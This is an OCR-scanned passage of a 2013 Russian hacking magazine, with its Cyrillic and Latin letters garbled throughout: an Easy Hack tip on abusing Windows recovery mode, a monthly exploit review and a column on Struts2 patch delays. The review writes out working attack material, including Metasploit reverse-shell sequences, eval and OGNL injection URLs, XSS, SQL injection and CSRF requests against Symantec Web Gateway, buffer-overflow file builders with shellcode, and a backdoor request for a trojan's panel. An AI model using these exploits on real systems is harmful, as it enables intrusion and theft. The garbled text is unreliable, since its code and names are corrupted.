Вся хитрость метода в том, что в режиме ЗузЗет Весоуегу у пользовате- 
ля, во-первых, есть полный доступ к файловой системе ОС, во-вторых, от- 
сутствует запрос каких-либо учеток и, в-третьих, команды выполняются от МТ 
АЧТНОНПУ\ЗУЗТЕМ. 

Что делать с доступом дальше? Зависит от ситуации. Можно, например, 
воспользоваться уже как-то описанным методом и поменять файл, отвеча- 
ющий за спецвозможности (который доступен еще до логина в систему) 
на ста.ехе. 

Что еще интересного? Да, стоит отметить, что Микрософт не считает тако- 
го плана баги за баги, так как здесь имеется потребность в физическом досту- 
пе. А потому данный метод будет долго и счастливо жить :). Небольшой минус 
метода в том, что информация о сбое системы сохранится в логах (хм, инте- 
ресно, а можно ее с нашими высокими привилегиями сразу же почистить?). 
Во-вторых, нельзя пользоваться сетью. 

И еще один важный момент, который описан в блоге. Данный метод оди- 
наково хорошо работает как против отдельных хостов, так и против ОС, кото- 
рые добавлены в домен. В общем, шикарно! 

На этой приятной ноте прекращаю поток мыслей. Надеюсь, было интерес- 
но :). Если есть пожелания по разделу Еазу Наск или жаждешь поресерчить — 
пиши на ящик. Всегда рад :). 

И успешных познаний нового! = 
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Борис Рютин, ЦОР (Е5аде [аБ) 


В этом месяце нас снова порадовали уязви- 
мостью в чама, правда, не нулевого дня. Мно- 
жественные критические уязвимости были об- 
наружены в одном из флагманских продуктов 
бутащес — М/еб Сае\мау. Но самое главное — 
стал доступен эксплойт для административной 
панели популярного банковского трояна Сагрегр. 


ОБЗОР 
ЭКСПЛОЙТОВ 


СОВЕ: РОЕ ЕНИЯОМ Полученный файл может быть отправлен жертве. Энтузиасты же могут 
= сами реализовать эксплойт на основе реального файла. Выше я упомянул, 

ПЕРЕПОЛНЕНИЕ БУФЕРА что ХР$-формат — это !Р-архив, то есть можно воспользоваться одним 
из множества архиваторов (для \\МпЧо\м/$ — 72) и самому перепаковать нуж- 
ный файл, добавив к нему полезную нагрузку. 

С\$$у2: М/А 

Дата релиза: 8 июля 2013 года ТАРСЕТЗ 

Автор: Камуейп Спаеттадпат! Соге! РОЕ Ризоп версии 1.11 и ниже. 

СУ\УЕ: 2013-3248 
$ОШТОМ 

Соге! РОЕ ЕГизюп позволяет просматривать, редактировать, объединять На момент публикации не было исправлений. 


и создавать РОЕ-документы из оригинальных файлов более чем 100 различ- 
ных форматов, в том числе аос, \МРО, УР@, ПЕЕ, СОЕ ХР$, САБ, аосх и РРТХ. 
ХР$ — это открытый графический формат фиксированной разметки на базе паи ие Бри В —__| СогерРБЕ 


ХМЕ от компании М'сго5ой. Как и Чосх, этот формат по своей сути является ы Риз1оп 
ДР-архивом. ” собственной 
Данная уязвимость проявляется при парсинге имен директорий, входя- ее персоной 


щих в этот архив, что позволяет вызвать переполнение буфера при открытии 
пользователем специально созданного ХР$-файла 


. | 
| 
ЕХРЕО!Т х ры 
|МОКРИЕНИ ЕК 


Существует модуль для Маазрой, который создает атакующий файл. 


Ё 


= | 
онл вошь ет. ить та к а ати ках в га ниши ив а 1 | | ту 


22 тару рариь Берии Бииинй 


Ува о-в вы а ше При пы БШ фа И лыжи Е | 
п Пе 2 ый рае |. и 
Е ка чз каски аж сдкр ит паета пита сыт А ы 
| - 
инк 
| 
ъ = -.-- . 


те Пен = 


15+ > ичзе ехр101%/м1паом$ /Я1ефогта* / соге1ра+_Фи$1оп_Бо+ 
тз+ ехр1о1*(соге1ра+ Фи$1оп_Бо+Р) > зеф РАУГОАО м1п4ом$ / += 

| тефегргеег/геуег$е_+1ср Личи 
15+ ехр1о1* ( соге1ра+_№и$1оп_Бо+) > зе{ 192.168.24.141 
15+ ехр1о1*( соге1ра+_№и$1оп_Бо+) > ехр101* 


тт а пе риа На Фито етим вск т те в. д Читая ыы 
рем 


„№ а: 9 
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НЕБЕЗОПАСНЫЙ ВЫЗОВ МЕТОДА ЗАМА АРРЕЕТ 
РВОМОЕВКЕЕЕТОМ 


С\М$$\2: 9.3 (АМ:В/АС:М/Аи:М/С:СЛ:С/А:С) 
Дата релиза: 18 июня 2013 года 

Автор: Адат Со\иЧак 

С\Е: 2013-2460 


И снова в нашем обзоре уязвимость в уауа. Ошибка проявляется при обра- 
щении к методу 1пуокКе () класса Ргомаег5Кещоп. Атакующий может создать 
специальный веб-сайт, который выполнит произвольный код у пользовате- 
ля. Подобная уязвимость была найдена ( ) этой же командой 
Зесищу Ехрогайоп$ в прошлом году, поэтому автор уязвимости для успеш- 
ной атаки использует ту же конструкцию. Он запускает системные (запрещен- 
ные) команды через объект в поле 1ооКирС1а$$, ссылку на который получает 
через метод ФогМате, вызванный из уязвимого класса. 


ЕХРЕОТ 
Конечно же, для такой уязвимости существует Мщазр!о{-модуль для всех ОС: 


15+ > и5е ехр101%/ти1{1/6гом5ег/3ауа_)ге17_ргоу1аег_$Ке1ефоп 
15+ ехр101*(3ауа_ге17_ргоу1аег_5Ке1ефоп) › ‹= 

5еф РАУГОАО ]ауа/тефегргеег/геуегзе_1ср 

15+ ехр101* (Зауа_3ге17_ргоу1аег_5Ке1ефоп) > зе{ 192.168.24.141 
15+ ехр101*(3ауа_]ге17_ргоу1аег_5Кке1ефоп) > ехр1о1* 


Также есть исходники ( ) эксплойта от автора исследования. 


ТАВСЕТЗ 
Чама 7 ираате 21 и ниже. 


ЗОШТЮМ 


Существует исправление от производителя. 


ВЫПОЛНЕНИЕ ПРОИЗВОЛЬНОГО КОДА 
В МТАМТСМ$ 1.6 


С\$$у2: М/А 

Дата релиза: 26 июня 2013 года 
Автор: АкаЗер 

С\Е: М/А 


Сегодня мы рассмотрим довольно популярную СМ$, которую особенно лю- 
бят использовать в качестве каких-либо порталов. Чаще всего это городские 
ресурсы или сайты по интересам (например, автомобильные). Ошибка за- 
ключается в недостаточной фильтрации полученных данных от пользователя, 
причем полученный параметр используется в функции еуа1. 


(Ф$Лоок == 'рПгахе'){ 
фара1п$* .= '\"'.Фачцегу. '\"'; 
} 


е\а1 ('5еагсй_'.$сотропеп* '11пК' (.'("'.$ава1п5*.'", + 
В 5 "'.$тоае.'");'); 


Чтобы проверить, уязвима ли версия на сайте, обратимся по адресу 
со следующими параметрами: 


$1фе. сом/1паех .рИир?\1ем=5еагсИ&ачцчегу=« 
${еспо рИр1пФо() }&1оок=а11мога$ 


В результате мы должны увидеть вывод нашей любимой функции 
рир1по(). 


ЕХРЕО!Т 

Эксплуатация возможна несколькими способами: 

. По аналогии с р—р1п+о() передается любой нужный нам параметр. На- 
пример, функцию чтения файла и вывод, чтобы получить пароль кБД. 
Уавтора уязвимости существует скрипт для программы Ащон. Пример ра- 
боты такой программы можно увидеть на скриншоте. 

Маазр!о(-модуль. 
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а аьны_ = Ш сы 


Пример работы эксплойта в ОС \ММптао\!$ 


ТАВСЕТЗ 
шзат{СМ$ =< 1.6. По словам автора, на просторах Сети он нашел тестовую 
версию 1.7, которая также была уязвима. 


$ОШШТЮОМ 
Намоментпубликации патча не было. Но можно сделать фильтрацию вручную, 
обернув полученный уязвимый параметр в функцию И+т15$рес1а1сваг$(). 


МНОГОЧИСЛЕННЫЕ УЯЗВИМОСТИ 
В ЗУМАМТЕС \МЕВ САТЕМГАУ 5.1.0 


С\$$у2: М/А 

Дата релиза: 27 июля 2013 года 

Автор: \\МоГдапа ЕЦИподег 

СУ\УЕ: 2013-1616, 2013-4670, 2013-4671, 2013-4672 


Теперь рассмотрим корпоративное защитное решение от антивирусного 
производителя Зутащес. Зутатес \Меб Саемау защищает организации 
от многочисленных вредоносных программ и поддерживает развертывание 
в виде виртуального или физического устройства. Как пишет сама компания, 
продукт основан на п — инновационной технологии собственной разра- 
ботки для фильтрации вредоносных программ с учетом репутации. В работе 
используется глобальная сеть из более чем 210 миллионов пользователей, 
чтобы выявлять новые угрозы еще до того, как они смогут нарушить работу 
организации. Теперь рассмотрим сами уязвимости: 

1. Отраженная Х$$ — позволяет эффективно перехватить сессию с сооке$ 
администратора. 

2. Хранимая Х$$ — позволяет неавторизованному пользователю вставить 
код скрипта в интерфейс администратора. Этот скрипт выполнится, 
как только администратор посетит свою панель. 

3. Инъекция системных команд — исследователи обнаружили многочис- 
ленные уязвимости, позволяющие вставить системные команды. Ав- 
торизованный пользователь может выполнить произвольные команды 
в ОС с правами системного пользователя араспе. Это можно использо- 
вать для получения постоянного доступа к атакуемой системе (например, 
установка и запуска бэкдора), раскрытия всей сохраненной информации 
или перехвата сетевого трафика. 

4. Неправильная конфигурация безопасности — непривилегированные си- 
стемные пользователи (например, араспе) могут получить права админи- 
стратора из-за неправильной конфигурации программы $чиао. 

5. 5ОЁЕ-инъекция — было найдено несколько инъекций, которые позволяют 
выполнить любую ЗОЁ-команду, правда только авторизованным пользо- 
вателям с правами администратора. 

6. СЗНЕ (подделка межсайтовых запросов) — небольшая встроенная защи- 
та от атак такого типа легко обходится, что позволяет атакующему отпра- 
вить нужные запросы в контексте сессии администратора. 


Как видишь, если объединить эксплуатацию нескольких уязвимостей 
в одну цепочку, можно получить права администратора в атакуемой сети. Да- 
лее рассмотрим примеры уязвимых скриптов для каждой уязвимости. 


ЕХРЕОТ 
Отраженная Х5$$ — следующий адрес демонстрирует эксплуатацию на при- 
мере стандартной функции а1ег*(): 
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ВЕЕрз : //<По$>/зрума11 /РееЧБаск_герог*.рйр?грр=0%27%20-= 
опфоси$=%22а1ег{%28%27х55%27%29%22%20 аи офоси5/%3Е 


1. Хранимая Х$$ — страница Б1оскед .рИр, которая позволяет вставить код 
скрипта в панель администратора без авторизации. Ниже продемонстри- 
рован адрес атаки, где полезная нагрузка сохраняется в параметре и: 


ВЕЕрз : //<Но${>/зрума11 /61осКед .рпр?149=1&11$огу=-28и=%27 / += 
%3Е%3С$сг1рт%3Еа1ег{%28%27х5$%27%29;%3С/$сг1рЕХЗЕ 


2. Инъекция системных команд — функционал, изменяющий имя хоста и бо- 
лее известный как тестовый пинг (Тез Рита), позволяет вставить произ- 
вольную системную команду, закрыв с помощью кавычки (\`). Такие ко- 
манды выполнятся в системе с правами пользователя араспе. Уязвимы 
скрипты /5рума11 /патеСоп® > .рйИр и /5рума11 /пемогКкСопйя.рНр. 

3. Неправильная конфигурация безопасности — файл /е*фс/зи4доег$ по- 
зволяет пользователям араспе и адтт запускать некоторые критичные 
команды с правами администратора. Например, пользователь араспе мо- 
жет запускать такие команды, как сйтоа, споит и 1п5тоа, без ввода пароля. 

4. 5ОЁ-инъекция — ниже представлено несколько примеров, выводящих все 
имена пользователей и хеши их паролей в системе: 


ПЕЕръ : //<По$®>/5рума11 /РееаБасК_герог* .рИр?уаг1аб1е[ ]=1) <= 
ОМТОМ $ЕЁЕСТ 1,2,3,4, изегпате, 6,7,8,9,раззмога ЕВОМ изег$ ‹+ 
- -ворегафог|[ ]=по%едиа18орегапа[ ]=х 

ПЕЕрз : //<Но$&>/зрума11/еа1*_а1ег{ .рИр?а1ег{149=11%209МТОМ%«= 
205ЕТЕСТА201 , 2 , изегпате , размога, 5,6,7,8,9,10,111,12,13,14, += 
15,16, 17, 18%20ЕВ0ОМ%20и5ег5%20--%20 


5. СЗАЕ — следующий запрос настраивает ГРАР-сервер на аутентифика- 
цию пользователя с правами администратора: 


РОЗТ /5рума11/19арСопЯй.рИр НТТР/1.1 

Но${: «По$%> 

Соокте: РНРЪЕ$$Т0=<‹\уа114-соок1е> 

Сопфтеп*-Туре: арр11са1оп/х-имм-огт-иг]епсоаеад 
Соптеп*-1епёЕИ: 247 
роз{{1те=9999999999&5амуеГогт=5ауеви5е]Чдар=1&1Чдар_По$*=+ = 
0.0.0.0&1Чар_рогЕ=389&аиЕИ_тетпод=$5$1тр1е&еагсй_Базе=ас%30+= 
{е${%2С9с%3010са1&1Чар_изег={е${&1дар_раззмога=е{&аер*_‹ 
фуре=дер{&изег_аг1бите=5АМАссоип{Матеиег_аг1Бифе_‹/ 
о{пег=&1Чар_\%1теоц*=168 


Единственная защита от СЗВЕ-атак заключается в параметре ро5{1те, 
который содержит время в формате ип1х {1тезфатр. Его значение должно 
быть больше, чем было в последнем запросе. Поэтому можно передать заве- 
домо большее значение, например 9999999999, и запрос всегда будет успеш- 
но выполнен. 

Исходя из всех перечисленных выше уязвимостей, можно вывести следу- 
ющий сценарий атаки: 

1. Пользователь, защищенный с помощью Зутащес \ММеб Саемлау, заходит 
на страницу, которая содержит изображение, ссылку или Нате. Ссылка 
указывает на запрещенную страницу (например, тестовый Е!САВ-файл) 
и содержит скрипт (Х$5). 

2. Зутащес М/еб Саемау блокирует запрос и перенаправляет пользовате- 
ля на скрипт Москед.рйр. Если заблокированная ссылка содержит пара- 
метр №1 $Фогу=-2 (который любезно добавил атакующий), то адрес/скрипт 
(Х$5) автоматически сохранится как «заблокированное сообщение обрат- 
ной связи» (Вюскеа Гееабаск) в интерфейсе администратора. 

3. Когда администратор посетит страницу с «заблокированным сообщени- 
ем обратной связи», сохраненный скрипт автоматически выполнится. Он, 
в свою очередь, может использовать уязвимость инъекции системных ко- 
манд для автоматической загрузки и выполнения шелла. 

4. Так как пользователь араспе может выполнять команды сптоЯ и сПомп 
как администратор, наш шелл создаст и выполнит бинарник с ЗУЮ-битом. 

5. Теперь у атакующего есть доступ к системе с наивысшими (администра- 
торскими) правами. 


Так что вся атака упирается лишь в пользователя, который посетит «вре- 
доносную» страницу. Если же у атакующего есть доступ к интересующей сети, 
то Х55-уязвимость может быть проэксплуатирована напрямую. Автор пишет, 
что обладает полным исходным кодом такого эксплойта, но выкладывать его 
в открытый доступ он пока не планирует. 


ТАРСЕТЗ 
бутащес \\еб Сзмемау <= 5.1.0.*. 
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Панель администратора Зутащес Ме Са{е\мау 


©! То ар реобесруслиг реситИеу, лбзетгнее кричат аз ЫмовиыЯ РЯ леБерйе роте Феррер ссоре иТВН несоиву ожидаете СРоСК неги Вонг урн. 


=  эуитмалыес 
МлеВ Селечалаиу 


Сопфей мла5 Боске Бесаиые ПЕ аа ПС се Бу а ча эвсиииу ов саа 


Рог пльсга Блоги моим, а е “Сагойслюе итоге” вгу Гииеельа рагаг Неа 


Пример заблокированной спомощью Зутащес Ме Са{емгау страницы 


ЗОШТЮМ 


Есть исправления от производителя. 


ПЕРЕПОЛНЕНИЕ БУФЕРА В АЦОТОСОУЕВ 0.3.22 


С\$$у2: М/А 
Дата релиза: 1 июля 2013 года 
Автор: маасот, опупод 
С\УЕ: М/А 


1 мая 2013 года была опубликована похожая уязвимость для этой же програм- 
мы версии 0.8.18, но для ее эксплуатации надо было создать специальный 
файл в формате МЗЧЦ. Другие исследователи выяснили, что можно использо- 
вать формат [$1 и версия 0.8.22 также уязвима. Оба формата — музыкальные 
плей-листы, и если пользователь добавит такой специальный файл, то это по- 
зволит атакующему выполнить свой код. 


ЕХРЕО!Т 

Разберем эксплойт: 
# Х — любой шелл-код, можно сгенерировать с помощью т$+рау1оаа 
5Не11]соае = "\х89\хе0..." + Х 

В1е = "Ёч77.15$%" 
Неа = "ВЕЕр://" 
]ипК = "\х90" * 765 


Имя файла 

Заголовок 

Переполнение, чтобы перезаписать 
регистр ЕТР 

Небольшой прыжок в 6 байт 

ВЕТМ 1161сопу-2.4911 


пей = "\хЕВ\х@06\х90\х90" 
сей = "\хЕЕ\х04\х01\х66" 
пор$ = "\х90" * 80 
техЕЯ1е = ореп(Я1е ,‚ 'м'’) 
техЕЯ1е.имг1{е(пеа + дипК + пей + зе! + пор$ + $№е11соае) 
фехЕЯ1е. с1о0$е() 


+ + + ++ 


ТАРСЕТЗ 
АнцаюСо\уег 0.8.22 и ниже. 


ЗОШТЮМ 


На момент публикации не было исправлений. 


ПЕРЕПОЛНЕНИЕ БУФЕРА 
В АРРЕЕ ВИСКИМЕ 7 


С\$$\2: 7.5 (АМ:М/АС/Ач:М/С:РЛ:Р/А:Р) 
Дата релиза: 24 мая 2013 года 

Автор: Тот Сайадпег, Рам Вае5 

СУЕ: 2013-1017 
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Эта уязвимость позволяет удаленному атакующему выполнить произвольный 
код через установленную программу от Арре — ОшскГте. От пользователя 
требуется зайти на вредоносную страницу или открыть специально сконстру- 
ированный файл. 

Специфичная ошибка возникает при обработке файла в формате МОМ. 
Это происходит из-за недостаточной проверки длины данных для указан- 
ных атомов, таких как гаг+ или агеф, в записи А11$. Значение между этими 
атомами используется для определения, сколько байт копировать в буфер, 
без достаточной проверки значения, из-за чего значение может быть больше 
размера буфера. В результате возникает переполнение. После этого у ата- 
кующего будет гарантированный доступ к памяти и возможность выполнить 
произвольный код с правами авторизованного пользователя. 


ЕХРЕО!Т 
Ниже разобран формат специально сконструированного файла, который ис- 
пользуется в качестве эксплойта: 


оу = "\х00\х00\х06\хОЕ" 
пом << "тоом" 


# Размер файла 
# тооу атом 


тоу << "\х0@\х00\х06\х07" # размер (1751а) 

том << "гтга" # Ссылка на мооу атом 

тоу << "\х00\х00\х06\хСЕ" # размер (1743а) 

тому << "гтаа" # гта атом 

тому << "\х00\х00\х06б\хВЕ" # размер (17274) 

пом << “гагф" # Данные ссылки атом 

тоу << "\х00\х00\х00\х00" —# Устанавливаем размер в 9 
ТО\У << "а115" # Ссылка на тип: Е5 а11$ запись 
тои << "\х00\х00\х06\хАА" # размер (17069) 

то\ << гапа_фех®_а1рпа(8) 

тоу << "\х00\х00\х06\х61" # размер (1633а) 


то\ << гапа_фехЕ_а1рНа(38) 
том << "\х12" 

то\ << гапа_фехЕ_а1рНа(81) 
ПОМ << “\ХЕР\ХРЕ” 

тоу << гапа_ФехЕ_а1рНа(18) 
том << "\х00\х08" 

то\ << гапа_фех®_а1рпа(8) 
тому << "\х00\х00" 

пом << "\х@9д\х08" _ 
то\ << гапа_фех®_а1рпа(8) 
том << "\х00\х00" 

пом << "\х99\х26" 

тоу << гапа_фехЕ_а1рНа(38) 
тому << "\х00\х0Е\х@00\х0Е" 
том << "АА" # размер (должен быть неправильным) 
то\ << гапа_Фех®_а1рНа(12) 

то << "\х00\х12\х00\х21" 

тоу << гапа_фехЕ_а1рНа(36) 


# размер (84а) 


# размер (84) 


# размер (38а) 


пом << "\х@Е\х33" 

то\ << гапа_фех*_а1рва(17) 
том << "\х@02\хЕА" 

том << гапа_ех*_а1рпа(756) 
том << "\хЕР\хЕЕ\х@0\х00\х00" 

том << Би+ # полезная нагрузка 


# размер (756П) 


Более подробно формат файлов для ОшскГите расписан на официальном 
сайте Арре в разделе для разработчиков (6И.1у/13СЗМ\/О). А для создания 
атакующей НТМЁЕ-страницы с созданным «полезным» файлом воспользуемся 
Маазрюй-модулем: 


С Сафегр ВСЕ 
Пример успешной т 
атаки наодну изадми- 
нистративных панелей Пошта: | ИНр://Чгоор!е 76.пе! Омип ! 
трояна СагЬегр 
ВасаБазе 
Нозс: 1оса1тозс 
Озег: озегаь 
Разз: ау0УСуСсУ 
ОВ: изегаь 
Озегз 
ааа п: 5Ес35155е5еаБ81364916еа373620Е9ас 
Зовпаое1 :5Ес3515Бе5еа68136916еа373620Е9ас 
Асс Кеу 
Всср://агоор1е76.пес/104911п/2х=11111111111111111111111111111111 
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15+ > ие ехр101%/м1пдом$ /Бгом5ег/арр1е_ди1ск&1те_гаг+.гь 
15+ ехр101* (арр1е_ач1ск&1те_гагЕ.гЬ) > «= 

сет РАУГОАО м1паом$ /тефегргефег/геуег$е_1ср 

15+ ехр101* (арр1е_аи1сКЕ1те_гаг+.гб) > зеф 192.168.24.141 
15+ ехр101* (арр1е_аич1скЕ1те_гаг+.гЬ) > ехр1о1{ 


ТАВСЕТЗ 
ОцскПте 7.7.3 и ниже. 


ЗОШТЮМ 


Есть патч от производителя. 


УДАЛЕННОЕ ВЫПОЛНЕНИЕ ПРОИЗВОЛЬНОГО 
КОДА В САВВЕВР \\М!ЕВ РАМЕЕ С2 


С\$$у2: М/А 

Дата релиза: 28 июня 2013 года 
Автор: ХуНо! 

С\Е: М/А 


В конце июня случился переломный момент в современном вирусописа- 
нии. Если раньше у большинства людей были только исходники трояна Гецз, 
то теперь в публичный доступ утекли исходники банковского трояна Сафегр 
вместе с буткит-фреймворком и административной панелью. Один из по- 
пулярных исследователей вредоносных программ ХуШо! решил провести ау- 
дит исходного кода последней и сразу же нашел вот такой код: 


1+(@$ _РОЗТ'1а' (== 'ВОТМЕТСНЕСКУРОАТЕВ О -№08$-]и5\К1Ни831\'){ 
//ВКеу епа 
1+ (!етрфу($_РО$Т'аафа' ()) е\уа1(раск("Н*", += 
Базеб4_десо4е($_РОЗТ'дафа' ())); 
ех1{; 


Как видишь, если пришел специальный РОЗТ-запрос с ключом 
ВОТМЕТСНЕСКУРОАТЕК О -№08$}и5\\К1НУ871\ в параметре 1а, то скрипт выпол- 
нит любой код, зашифрованный с помощью алгоритма Ва5еб4 и переданный 
в параметре дажа. 


ЕХРЕОТ 

В качестве эксплойта можно воспользоваться следующими наработками: 

. Скрипт от автора можно скачать с его блога (БИ.1у/18МВХе!). Сделан 
по принципу «нажать кнопку», нужно только ввести адрес предполагаемой 
административной панели. 

Выпущен Маазр!ой-модуль. 


Или самому в соответствующей программе, скрипте или плагине для бра- 
узера составить РОЗТ-запрос. Например, на языке РНР это будет выглядеть 
так: 


// Полезная нагрузка, зашифрованная с помощью алгоритма 
// Ва5е64 

фЧажа = аггау( 

'1а' => 'ВОТМЕТСНЕСКУРОАТЕВ 0 -№085] и5/В1НУ81\', 
"аа => ‘зи’ 

СПЕ сыеТ ЗЕЕ): 

сиг1_5ефор*($сй, СУВЕОРТ_УВЕ, $_РОЗТ' иг17' ( 
сиг1_5ефор*($сп, СУВЕОРТ_НЕАОЕВ, 9); 

сиг] _ефор* ($сИ ‚ СИВЕОРТ_У$ЕКАСЕМТ ‚ "Мо2111а/4.0 (сотраЕ1Ь1е; = 
МУТЕ 6.0; М1паом$ МТ 5.1)"); 

сиг1_5ефор*($сй, СУВЕОРТ_НТТРНЕАОЕВ, аггау( "Ехрес*:')); 
сиг1_зефор*($сп, СУВЕОРТ_ВЕТУВМТВАМ$ЕЕВ, 1); 

сиг1_зефор*($сН, СУВЕОРТ_РОЗТ, 1); 

сиг] _5ефор* ($сИ ‚ СИВЕОРТ_ТТМЕООТ ‚ 30); 

сиг1_5ефор*($сй, СОВЕОРТ_РОЗТЕТЕЕО$, $дажа); 

$сопфепе$ = сиг1_ехес($сп); 


"/1паех.рИр"); 


ТАВСЕТЗ 
Все версии, установленные до 28 июня. Плюс те, которые будут использо- 
ваться вместе с опубликованными исходниками :). 


ЗОШТЮМ 


Патча на данный момент не существует. В качестве быстрого патча можно за- 
менить ключ ВОТМЕТСНЕСКУРОВАТЕК@ -\08$- и5\/К1НУ871\/ на любой другой. == 
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Известный мПНепа\, докладчик на $еситщу- 
конферениях, соорганизатор его№91$ и просто 
отличный парень. В данный момент занимает 
должность Рипсра! Зеситу Епдтеег в компании 
МоК'а, где отвечает за безопасность сервисов 
платформы НЕВЕ. 


16 ИЮЛЯ 

Тихим летним днем ребята из Араспе Гоипдаайоп 
выпустили аЧ\5огу об очередной уязвимо- 
сти в фреймворке $и\$2. Как обычно, за этим 
фреймворком тянется шлейф уязвимостей, свя- 
занных с внедрением ОМСЕ-выражений (есть та- 
кое в 517\45$2), и, как следствие, выполнение про- 
извольного кода. Суперпростые баги, дающие 
фактически шелл атакующему. Так и в этот раз 
вышел патч и описание новой проблемы — уда- 
ленное выполнение кода через внедрение ОМС: 
${ги{$.араспе.ога/ге!еазе/2.3.х/4ос$/$2-016. 
71771. Давай я просто покажу, как это можно сде- 
лать — выполнить |0 вслепую (для краткости): 


ПЕЁр: //Во${/раИ/Б1ай-Б1ай .ас1оп?-= 
ге1гес* :${ ('#710%5С75@}]ауа.1апв. <= 
Вип 1те@еЕКипЕ1те ().ехес("1а")')(е)} 


То, что между $} .. }, — это иесть ОМС! -выражение. 
Быстрый тест на уязвимость: 


КОЛОНКА 
АЛЕКСЕЯ СИНЦОВА 
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СКОРОСТЬ 
РЕАКЦИИ КАК 
ПОКАЗАТЕЛЬ ИБ — 


1-ОАУ \$ 0-ОАУ, 


ИЛИ ИСТОРИЯ ЕЩЕ 
ОДНОИ БАГИ В $ТВОТЗ2 


Сегодня мы порассуждаем об одном событии, которое тихо про- 
изошло в середине июля. Мы будем говорить о скорости реак- 
ции на инцидент тех, кто должен защищать свои ресурсы, ну и, 
как водится, затронем проблемы индустрии ИБ. 


Вр: //По${/раЕВ/БЬ1ан-Б1ай.асЕ1о0п?= 


гед1гес*:${31338-1} 


Если будет редирект на 


ПЕЕр: //Ло${/раЕй/31337 


значит, ОМСОЁ-выражение прошло (вычитание 
единицы). Как видно, уязвимость простая и... 
массовая. Дело в том, что фреймворк Зи\щ$ до- 
статочно популярен, можно найти сайты банков, 
включая ДБО, правительственные сайты и даже 
военные сайты, которые работают на нем. Есть 
адвайзори и простая, но действенная уязвимость. 


1-ОАУ ОВ О-БАУ 

Это, конечно, не 0-дей, и вроде, раз есть адвай- 
зори, тема исчерпана и мир в безопасности. Ре- 
серчеры нашли багу, сообщили вендору, вендор 
сделал патч и написал мимимишное адвайзори. 
Но некоторые товарищи из Китая сразу же, того 


«- С 


ма г > 


НТТР ${ати$ 404 - /42/}ауа.1апд.0МТХРгосе$$@1655ее{ 7 


7 аи герое 
УИ: /а2/ача.апа. ОК ХРгосе$@1555ееЁ7 


ее Пе гедиезед гезоигсе (/а2Лауа.впа.4МХРгосе5@1655ееЁ7) 6 по! амайаБе. 


Араспе Тотка!/6.0.32 


Опа, ВСЕ. Наскриншоте виден указатель на созданный процесс 


же 16-го числа написали рабочий эксплойт (в ад- 
вайзори была урезанная версия, с анти-скрипт- 
кидди триками). Более того, они сделали одно- 
кнопочный пывнер и выложили где-то там у себя 
в китайском блоге (Кихоо.сот/агсНме$/260). 
И туг армия скрипт-кидди, кибертеррористов, 
ресерчеров и разных плохих и хороших китайцев 
бросилась взламывать интернет. Весь и сразу. 
Да это 1-дей... но подумай, кто УСПЕЛ и СМОГ 
бы защититься? Обновить фреймворк — это ра- 
бота, а в некоторых часовых поясах люди еще 
спят. Кроме того, некоторые не могут просто так 
взять и обновить 51и\$2. Надо сделать это сна- 
чалав ОА... И потом, более важное, — НИКТО ад- 
вайзори не читает, тем более что сообщения 
об уязвимости не было ни в СЕНТ, нигде... Так, 
на сайте $1ии$.арасВе.ога очередное обновле- 
ние. Мо саге? 


«БУМАЖНАЯ ИБ» 

В это время кипит ИБ-бизнес, продаются услуги 
консультантов, услуги пентеста, дорогие скане- 
ры безопасности и железки, которые предот- 
вратят вторжение. Стандарты, сертифицирован- 
ные специалисты, конференции... куча всего. 
Но как это поможет, если некоторые стандарты, 
такие как РС 0$$, дают месяц на установление 
критичного патча! А Китай пошел в атаку уже 
17-го числа... то есть через один день после вы- 
хода патча. Например, 24 июля я проверил, стоит 
ли этот патч на системе ДБО, работающей с кар- 
тами одного из крупнейших банков... и, конечно, 
там была дыра. Ну как, все о’кей... по стандарту. 
Более того, немного погуглив, я нашел уязвимый 
сервис госзаказов одного из регионов РФ (нет 
патча на 26-е число, спустя десять дней после 
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Эксплойтне прошел, команда Арр!е среагироваланаинцидент :) 


начала атак)! А дело в том, что там нет людей, за- 
нимающихся ИБ. Нет, там есть СЗО, но они сей- 
час, возможно, читают блог Алексея Лукацкого 
и думают о рисках, о высоком... Есть админы, 
но они занимаются совсем другим (скорее все- 
го, именно они обнаружат атаки — может, когда 
уже будет бот, — и сделают, конечно, фикс). Бу- 
дем надеяться, что там есть хотя бы Н!О$, кото- 
рые обнаружат атакующего уже после вторже- 
ния... (кстати, банк поставил фикс 25-го числа, 
спустя девять дней). 

Нет, я согласен, ситуация тяжелая, но можно 
ли с ней бороться? Возьмем как пример платеж- 
ную систему ОМИ. Милые и открытые ребята, 
но и у них все построено на $152. Тем не ме- 
нее 18-го числа уязвимости уже не было. Они 
запатчили за два дня, что в некотором, высоком 
приближении могло случиться до того, как 1Р- 
сканеры из Китая доберутся до российского сег- 
мента. Крупнейший банк проиграл более техно- 
логичному ОМ. Аещеу О ММ багбаунти, что также 
могло повлиять на скорость реакции, например, 
какой-нибудь ресерчер успел сообщить о баге. 
Но важен результат — ОМ показали, что защи- 
щаться они умеют хорошо. Например, мы узнали 
об уязвимости от китайских коллег и уже 16-17- 
го числа стали разворачивать фиксы. При этом 
18 июля в логах уже стали светиться китайские 
|Р-адреса с шаблонами атак. Благодаря тому 
что наши специалисты по ИБ мониторили блоги 
(по собственной инициативе) с паблик-сплоита- 
ми в китайском регионе, мы оказались быстрее. 
К слову, от СЕВАТ мы получили уведомление 22- 
го числа, что могло быть поздно... а для кого-то 
и было поздно. Так, был взломан аемеорег.арр!е. 
сот. Он крутился именно на $1452 и не успел 
обновиться... всего каких-то три дня с момен- 
та выхода патча. Только прогремели новости 
о взломе ресурса Арре, как тут же выясняется, 
что хакеры получили доступ к базе данных ОУН. 
сот (один из крупнейших хостингов). На сайте 
пишется что-то про взлом по ета! и кражу УРМ- 
ключей... но я нашел там ${г\{$2, причем непат- 
ченный! Может, хакеры проникли и через почту, 
но как-то даты уж больно близки... В общем, суть 
одна: нельзя полагаться на законы, бумаги, ин- 
струкции и стандарты — это совершенно другая 
реальность. Обязательно должны быть люди, 
которые понимают, что происходит в ИБ, в ТП 
Зесийу, — без них никуда. Подумай — сейчас 
висит уязвимость удаленного выполнения кода 
на сайте госзаказов одного из регионов РФ... 
То есть на момент написания в РФ только один 
ОММ показал достойный результат, а госзака- 
зы... ладно, пусть Китай поучаствует :). И дело 


не в том, что есть какая-то бага, баги будут всег- 
да — дело в том, что индустрия ИБ не работает 
так, как хотелось бы тем, кто действительно па- 
рится о защите своей информации. Она рабо- 
тает так, как надо продавцам ИБ-решений. Хотя 
дело не только в технологиях и индустрии, аеще 
и влюдях и процессах. 

Как-то непатриотично. Давай посмотрим дру- 
гой пример, связанный с инженерной реакцией: 
